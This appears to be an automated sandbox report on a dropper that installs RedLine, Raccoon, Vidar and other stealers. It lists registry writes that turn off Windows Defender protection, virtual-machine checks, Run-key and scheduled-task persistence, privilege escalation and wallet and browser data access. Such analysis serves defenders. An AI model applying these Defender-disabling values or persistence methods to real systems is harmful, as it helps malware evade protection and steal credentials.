Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe | N/A

OnlyLogger

loader onlylogger

PrivateLoader

loader privateloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

Raccoon

stealer raccoon

Raccoon Stealer payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

RedLine

infostealer redline

RedLine payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Socelars

stealer socelars

Socelars payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Vidar

stealer vidar

Looks for VirtualBox Guest Additions in registry

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe | N/A

OnlyLogger payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Vidar Stealer

stealer
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

ASPack v2.12-2.42

aspackv2
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Downloads MZ/PE file

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07ef9e317e0f6ae.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue072fdbb8e4b2f5.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07e35cf558.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07a633a94f9.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07b3bf87d8.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue071e59dc8292b4ef1.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07816149b72db00.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-BF9RV.tmp\Tue07e35cf558.tmp | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0750373995e75.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0750373995e75.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe | N/A
N/A | N/A | C:\Program Files (x86)\Installoid\installoid.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\zaebalidelete2_2.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\bezo.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\blb0l.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\BKqUCEa.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\manager_like_1.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\Hfcdvjjdsxvb_crypted_1.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\zxc_team_1.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\yaeblan_v0.7b_2133_windows_64.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\Fenix_2.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\instal.exe | N/A
N/A | N/A | C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~4.EXE | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\Lammings.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\FWsDwwvaVRZQ.bmp.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-R890Q.tmp\B2BCH2.exe.tmp | N/A

Looks for VMWare Tools registry key

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe | N/A

VMProtect packed file

vmprotect
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~4.EXE | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Pictures\Adobe Films\wam.bmp.exe | N/A
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Installoid = "\"C:\\Program Files (x86)\\Installoid\\installoid.exe\"" | C:\Program Files (x86)\Installoid\installoid.exe | N/A
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Pictures\Adobe Films\0.bmp.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe | N/A
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe | N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A
N/A | ip-api.com | N/A | N/A
N/A | ipinfo.io | N/A | N/A
N/A | ipinfo.io | N/A | N/A
N/A | ipinfo.io | N/A | N/A
N/A | ipinfo.io | N/A | N/A
N/A | ipinfo.io | N/A | N/A

Looks up geolocation information via web service

Maps connected drives based on registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe | N/A
File opened for modification | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe | N/A
File created | C:\Program Files (x86)\Installoid\installoid.exe | C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe | N/A
File opened for modification | C:\Program Files (x86)\Installoid\installoid.exe | C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe | N/A
File created | C:\Program Files (x86)\Installoid\config.json | C:\Program Files (x86)\Installoid\installoid.exe | N/A

Enumerates physical storage devices

Program crash

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue071e59dc8292b4ef1.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\blb0l.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\bezo.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe
N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\swncvftv.qwx\rmaa1045.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe | N/A
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe | N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue072fdbb8e4b2f5.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe N/A
